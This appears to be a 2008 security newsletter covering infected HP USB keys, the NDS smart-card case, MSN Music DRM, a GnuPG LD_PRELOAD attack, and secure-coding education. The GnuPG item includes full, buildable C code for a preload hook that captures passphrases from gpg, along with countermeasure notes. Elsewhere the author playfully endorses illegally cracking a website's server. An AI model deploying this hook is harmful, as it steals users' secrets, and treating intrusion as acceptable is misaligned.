Virus: even HP

HP announced that some USB keys shipped with the USB floppy disk drive for HP ProLiant servers are infected by two minor viruses, SillyFDC and Fakerecy. An up-to-date anti-virus detects them. But what if you install the floppy drive software before the anti-virus?

It was already troublesome that some consumer electronic devices (see security newsletter 9, to be published tomorrow) shipped infected with viruses. It is far more problematic in the case of professional devices and applications.

USB keys are becoming pervasive, and they are a perfect vector for worms. A good protection is to disable autorun for every USB port, and of course to keep your anti-virus up to date. Note that disabling autorun only blocks automatic execution: an installer that you launch by hand from the key still runs, so scan removable media before installing anything from it, even vendor-supplied media.

“Big Gun” is back

Does history always stutter? In 2002, the French broadcaster Canal+ sued NDS for having reverse engineered the software of its smart card and for having organized the leak of the pirated code through the site DR7.com. Christopher TARNOVSKY, a former hacker known as “Big Gun” and an NDS employee, was alleged to have taken part in the operation. The complete story is worthy of the best spy novels or Hollywood action movies.

Six years later, the same story again, this time with Dish Network. Christopher TARNOVSKY is testifying in court. He acknowledges that he worked for NDS and that he wrote a tool, “the stinger”, able to communicate with any smart card. He claims that he did not use his skills to break Dish Network’s security. NDS acknowledges that it did reverse engineer the smart cards, and then used the findings to enhance security and build a better product. NDS denies that it disseminated the code of pirate cards.

Communicating with any card is not the difficult part; extracting the code and data from the card is. Reverse engineering a piece of software or hardware is common practice in security research. The only way to validate the strength of a secure system is to attack it, and that must be done by a team different from the one that designed the system. Furthermore, the attacking team must have real hacking skills, to mimic the adversary the system will face in the real world.
Therefore, it is good practice for a security company to hire skilled people to evaluate its own security. Of course, there is always some related risk: there must be a strong trust relationship between the attacking and designing teams.

Once more, security is about TRUST.

MSN music will not deliver new licenses

In November 2006, MSN Music closed its service; it had not succeeded in competing with Apple’s iTunes. Recently, Rob BENNET of Microsoft announced that Microsoft will no longer deliver keys after 31 August 2008.
Why would you need new keys, since MSN Music no longer sells songs? MSN Music sold songs to be consumed on a given computer. Thus the license containing the decryption key is bound to the target computer. The binding uses unique characteristics of the computer, such as its configuration or its hard disk identifier; these characteristics are sometimes called a computer fingerprint. Therefore, there are two legitimate reasons to ask for a new key (or more precisely a new license) for an already purchased song:

  • The configuration of the computer changed, for instance after adding a new piece of hardware or after maintenance.
  • The consumer replaces the old computer and transfers her songs to a new one.

In other words, after August 2008, consumers will no longer be able to listen to their legally purchased songs if they change computer. Rob BENNET announced that Microsoft did not succeed in negotiating DRM-free songs with the studios. It is surprising: the merchant of the songs is Microsoft, the supplier of the DRM technology is Microsoft, and Microsoft did not find a solution? Perhaps it is a strategy by Microsoft to obtain DRM-free content. An interesting question: is MSN Music liable? Is a class action by fooled consumers possible?

Unfortunately, this story gives new strong arguments to DRM opponents. The problem is not so much the DRM itself. The problem is that the song is bound to a computer rather than to a “larger” entity. Were the song bound to the customer rather than to her computer, this problem would be solved. Were the Microsoft DRM interoperable with another DRM, this problem would be solved.

One example of a solution is the domain. A domain is the set of devices belonging to a person or a family. Were the song attached to a domain, it would no longer be managed by a merchant. Currently, two systems support domain-based DRM: DVB-CPCM and Coral. Unfortunately, they are not yet implemented in consumer devices. This story may be a booster for these solutions.

Is open source more secure?

In the same spring 2008 issue of 2600, phundie describes an attack on GnuPG, an open source signature program. He used the Linux LD_PRELOAD mechanism to override functions of a shared library. By analysing passphrase.c in the GnuPG distribution, he spotted the use of read() and memcpy(). He wrote a library overriding these two functions to dump the data passing through them into a file. Afterwards, it was rather simple to spot the typed passphrase in the dump.

In the paper, he proposes several countermeasures, such as using only statically linked binaries, rewriting one’s own versions of these routines, or verifying that LD_PRELOAD is not set. The last one is the weakest: a preloaded library runs its constructors before main() and can clear the variable before the program looks at it.
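As an added example (this is not phundie’s code, nor GnuPG’s), here is an LD_PRELOAD hook in C in the spirit of the paper, together with the environment check he proposes as a countermeasure. It assumes Linux with glibc; the library name hook.so, the HOOK_DUMP variable, the hook_* helper names and the sample passphrase are this example’s own choices. It reaches the real read() through the raw system call rather than the usual dlsym(RTLD_NEXT, "read"), so it builds without libdl.

```c
/*
 * Added example, not code from the 2600 paper or from GnuPG.
 * Interposes read() and memcpy(), keeps a copy of every buffer that passes
 * through them, and dumps the capture to the file named by HOOK_DUMP at exit.
 *
 * Build as a preload library:   gcc -shared -fPIC -o hook.so hook.c
 * Use against a dynamic binary: HOOK_DUMP=/tmp/dump LD_PRELOAD=./hook.so gpg --clearsign file
 * The same file builds as a stand-alone program (gcc -o hook hook.c) whose
 * main() shows the capture on a pipe round trip.
 */
#define _GNU_SOURCE              /* what a real hook needs for RTLD_NEXT; also prototypes */
#undef _FORTIFY_SOURCE           /* fortified inline wrappers would fight our definitions */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

extern long syscall(long number, ...);   /* glibc prototype, independent of feature macros */

#define CAP_MAX 65536
static unsigned char g_cap[CAP_MAX];     /* everything seen by read() and memcpy() */
static size_t g_len;

/* Byte copy through volatile pointers: the compiler must not turn this loop
 * back into a memcpy() call, which would recurse into our own hook. */
static void raw_copy(volatile unsigned char *d, const volatile unsigned char *s, size_t n)
{
    while (n--) *d++ = *s++;
}

static void capture(const void *p, size_t n)
{
    if (n > CAP_MAX - g_len) n = CAP_MAX - g_len;   /* drop the tail once full */
    raw_copy(g_cap + g_len, p, n);
    g_len += n;
}

/* Interposed read(): perform the real system call, then record what came in. */
ssize_t read(int fd, void *buf, size_t n)
{
    long r = syscall(SYS_read, fd, buf, n);
    if (r > 0) capture(buf, (size_t)r);
    return (ssize_t)r;
}

/* Interposed memcpy(): copy as usual, then record the bytes. No libc calls
 * inside, so nothing here can bounce back into the hook. */
void *memcpy(void *dst, const void *src, size_t n)
{
    raw_copy(dst, src, n);
    capture(src, n);
    return dst;
}

/* What the attacker does afterwards: search the dump for a candidate passphrase. */
size_t hook_capture_len(void) { return g_len; }

int hook_capture_contains(const char *needle)
{
    size_t k = strlen(needle);
    for (size_t i = 0; i + k <= g_len; i++)
        if (memcmp(g_cap + i, needle, k) == 0) return 1;
    return 0;
}

/* The countermeasure from the paper: is LD_PRELOAD set at all? Weak on its own,
 * since a preloaded library can unsetenv("LD_PRELOAD") in a constructor before
 * main() runs; a statically linked binary has no PLT entries to hijack. */
int hook_preload_env_set(void)
{
    const char *v = getenv("LD_PRELOAD");
    return v != NULL && v[0] != '\0';
}

/* Stand-in for the victim: bytes written to a pipe, read back with read(),
 * then copied once with memcpy(), as passphrase handling code would do.
 * Buffer sizes are only known at run time, so the compiler cannot replace
 * either call with an inline expansion. */
ssize_t hook_demo_roundtrip(const char *secret)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    size_t n = strlen(secret);
    char *in = calloc(n + 1, 1);
    char *out = calloc(n + 1, 1);
    if (!in || !out) return -1;
    if (write(fds[1], secret, n) < 0) return -1;
    close(fds[1]);
    ssize_t got = read(fds[0], in, n);
    close(fds[0]);
    if (got > 0) memcpy(out, in, (size_t)got);
    free(in);
    free(out);
    return got;
}

/* Runs when the hooked process exits: write the capture to HOOK_DUMP, if set. */
__attribute__((destructor)) static void hook_dump(void)
{
    const char *path = getenv("HOOK_DUMP");
    if (!path || g_len == 0) return;
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return;
    if (write(fd, g_cap, g_len) < 0) { close(fd); return; }
    close(fd);
}

int main(void)
{
    /* constructed sample passphrase, not a real secret */
    hook_demo_roundtrip("correct horse battery staple");
    printf("captured %zu bytes; passphrase visible: %s\n", hook_capture_len(),
           hook_capture_contains("battery") ? "yes" : "no");
    return 0;
}
```

Two practical notes. First, the hook only sees calls that go through the dynamic symbol table: a statically linked gpg, or one whose passphrase code uses its own copy loop, leaves the capture empty, which is exactly why the paper’s first two countermeasures work. Second, the getenv() check is shown because the paper proposes it, but treat it as a tripwire rather than a defence: the attacker who controls the host also controls the environment.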

This paper clearly illustrates that open source is not adapted to a hostile environment: it gives a strong advantage to an attacker who controls the host. (Source access made the analysis faster; the hook itself needs only the binary’s dynamic symbol table, so a closed-source but dynamically linked program is exposed to the same trick, with more effort.) It would be interesting to write a good paper analysing the trust model of open source software and highlighting its assumptions. Any volunteer to be co-author?

A glimpse at hacking mentality

While reading the spring 2008 issue of the hacker magazine 2600, I had fun with the paper Password Memorization Mnemonic by Agent Zero. The paper itself is not extraordinary. Agent Zero has reinvented the notion of key derivation. He proposes, in a non-formalized way, to use a password-generating function for each site that takes the name of the site as a parameter. He ends up with passwords in the format <site name><code name><number>. This is a typical trick, and you may devise your own function, adding for instance special characters.

Is it a good trick? In fact, it is hardly more secure than using the same strong password on all sites. The security relies on the secrecy of the <code name> and of the algorithm (Kerckhoffs!). And with such a weak algorithm (necessarily weak, because it must be memorable), if you have the password for one site, it is not difficult to guess the algorithm, and from there the passwords for every other site.

The interesting point comes at the end of the paper. Some sites, for instance MySpace, limit the length of passwords, which ruins the algorithm. A normal user would propose a derived function that truncates the result to fit the requested length. But Agent Zero is a hacker, therefore he proposes:
1. Find a similar site with a better password policy.
2. Crack the webpage, system, or server. Show the webmaster or system administrator just how weak their current policy is, thereby spurring them to strengthen it. Admittedly, this is a more extreme (not to mention illegal) road to take, but it has been taken, and it has gotten results.
(Extract)
I love option 2. Definitely another mentality ;-)

Book: The Big Switch

Nicholas CARR was the author of Does IT Matter? In that first book, he questioned the future role of IT and forecast its end as a strategic asset. In this new book, he continues his prediction with the advent of cloud computing.

He forecasts that computing power will become a utility, like electricity. He draws the parallel with the transition to electric power. Big companies such as Amazon (Elastic Compute Cloud, EC2) or Google are offering grid computing to external companies. The interesting part of the book is the analysis of the impact this will have in conjunction with the advent of Web 2.0. It has already allowed small companies to succeed without a huge IT infrastructure.

The book also highlights the current trends of Web 2.0. Chapter 7, From the Many to the Few, is extremely interesting. It describes how companies such as YouTube or PlentyOfFish use, for almost nothing, mobs of well-meaning “content creators”. Chapter 8, The Great Unbundling, is about the transformation of content consumption. He predicts that the future of the Internet will not be as bright as expected.
“But it’s clear that two of the hopes most dear to the Internet optimists - that the Web will create a more bountiful culture and that it will promote greater harmony and understanding - should be treated with skepticism. Cultural impoverishment and social fragmentation seem equally likely outcomes.” (extract)

The security threats highlighted in the book are the usual malware and privacy issues.

A book to read, because it sheds a provocative light on the future of the Internet.

Oracle wants secure coding aware students

In her blog, Mary Ann Davidson, CSO at Oracle, highlights a weakness in the software supply chain. She castigates US universities for not training software students in secure coding. She is absolutely right, and it is not limited to US universities. Secure coding should be part of the normal curriculum of software development, like methodologies, algorithmics and languages. Very few students have this secure coding background when they join the industry. Unfortunately, security problems are becoming pervasive.

Even if students had secure coding lectures, this would not mean that they would become good at secure coding. It requires a certain mindset (hacker-minded?). Nevertheless, we could expect some benefits:

  • Some elements of secure coding in their day-to-day work
  • Fewer basic errors in what they produce
  • And most important, they would be security aware. They would ask knowledgeable people to put the right solution in place. They would avoid writing software with highways for hackers. They would be more robust against social engineering.

One of the challenges for teaching secure coding is that it is not as formalized as other elements of software programming. Secure coding is very much based on heuristics and a pinch of black art. Academic communities should invest more in this field, and more conferences should treat this topic. Furthermore, practitioners should teach in universities: only real practical knowledge can generate secure code. Industry should help universities in this challenge.

She also proposes to have students hack each other’s solutions. This would be a revolution, but a good practice: it creates the right mindset. Hackers are used to this at conferences such as DefCon, Black Hat or the Chaos Communication Camp. Even some governments run such challenges (see Défi Sécurité Système d’Exploitation Cloisonné et Sécurisé pour l’Internaute). Should we not have such hacking challenges between universities?

I would just like to cite a dreadful statement, unfortunately true:
“We simply – and collectively – must evolve to defensive mindsets delivering defensible code lest none of us survive in a hostile world.”